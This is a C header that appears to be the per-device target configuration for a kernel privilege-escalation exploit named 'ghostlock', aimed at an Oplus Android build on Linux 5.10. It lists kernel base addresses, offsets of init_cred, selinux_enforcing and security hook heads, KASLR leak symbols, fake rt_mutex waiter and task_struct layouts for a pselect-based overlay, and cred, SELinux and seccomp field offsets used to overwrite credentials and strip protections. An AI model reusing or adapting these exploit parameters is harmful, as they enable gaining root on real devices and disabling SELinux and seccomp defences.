#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "ghostlock_oplus_pjj110"
#define PSELECT_WORDS_V5_10 1

/* Kernel address layout. */
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define MTK_VADDR_BASE 0xffffffc000000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0x80000000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffff8c00000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffff9000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

/* Symbol offsets (extract_rs, cross-checked with kallsyms). */
#define INIT_TASK_OFF 0x27bc000ULL
#define INIT_CRED_OFF 0x27d0be0ULL
#define ROOT_TASK_GROUP_OFF 0x29b7040ULL
#define SELINUX_ENFORCING_OFF 0x2a683c8ULL
#define SELINUX_BLOB_SIZES_OFF 0x22ff320ULL
#define SECURITY_HOOK_HEADS_OFF 0x22fec88ULL

/* KASLR leak symbols. */
#define SLIDE_NFULNL_LOGGER_OFF 0x27b14b8ULL
#define SLIDE_LOGGERS_0_1_OFF 0x27b13f0ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x2b88b6dULL
#define SLIDE_SYSCTL_BOOTID_OFF 0x2b88b6dULL

/* Kernel addresses. */
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_CRED (KIMAGE_TEXT_BASE + INIT_CRED_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define SLIDE_NFULNL_LOGGER_IMAGE (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

/* pselect overlay: 5.10 waiter lands at fd_set word 0 (frame-derived) */
#define PSELECT_WAITER_WORD_SHIFT -2

/* Fake waiter layout (5.10): tree_entry@0, pi_tree_entry@0x18, task@0x30,
 * lock@0x38, list@0x40; NO augment prio/deadline, NO wake_state/ww_ctx.
 * The 6.x-only slots are moved beyond the struct (harmless writes). */
#define FAKE_WAITER_TREE_PRIO_OFF 0x50
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x58
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x18
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x60
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x68
#define FAKE_WAITER_TASK_OFF 0x30
#define FAKE_WAITER_LOCK_OFF 0x38
#define FAKE_WAITER_WAKE_STATE_OFF 0x70
#define FAKE_WAITER_WW_CTX_OFF 0x78

/* Fake task layout (5.10 task_struct, disasm-verified). */
#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x7d8
#define FAKE_TASK_PI_LOCK_OFF 0x86c
#define FAKE_TASK_PI_WAITERS_OFF 0x880
#define FAKE_TASK_PI_TOP_TASK_OFF 0x890
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x898

/* task_struct offsets (disasm-verified: cred 0x778/0x780, comm 0x790,
 * pi_lock 0x86c, pi_waiters 0x880, pi_blocked_on 0x898, tasks 0x608,
 * seccomp 0x848; pid/tgid 0x56c/0x570 medium confidence). */
#define TASK_PID_OFF 0x56c
#define TASK_TGID_OFF 0x570
#define TASK_ATOMIC_FLAGS_OFF 0x00
#define TASK_REAL_CRED_OFF 0x778
#define TASK_CRED_OFF 0x780
#define TASK_COMM_OFF 0x790
#define TASK_TASKS_OFF 0x608
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF 0x848

#define CRED_UID_OFF 4
#define CRED_SECUREBITS_OFF 36
#define CRED_CAPS_OFF 40
#define CRED_SECURITY_OFF 144
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF 4
#define SECCOMP_MODE_OFF 0x00
#define SECCOMP_FILTER_COUNT_OFF 0x04
#define SECCOMP_FILTER_OFF 0x08
#define TIF_SECCOMP_BIT 11
#define PFA_NO_NEW_PRIVS_BIT 0

#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x08
#define STRUCT_PAGE_TYPE_OFF 0x30

#define LOCK_OFF 0x0E80
#define W0_OFF 0x1180
#define FOPS_OFF 0x0F80
#define RIGHT_OFF 0x1240
#define LEFT_OFF 0x1260
#define FAKE_TASK_OFF 0x1280

/* W2 payload. */
#define CRED_COPY_OFF 0x1080

#endif
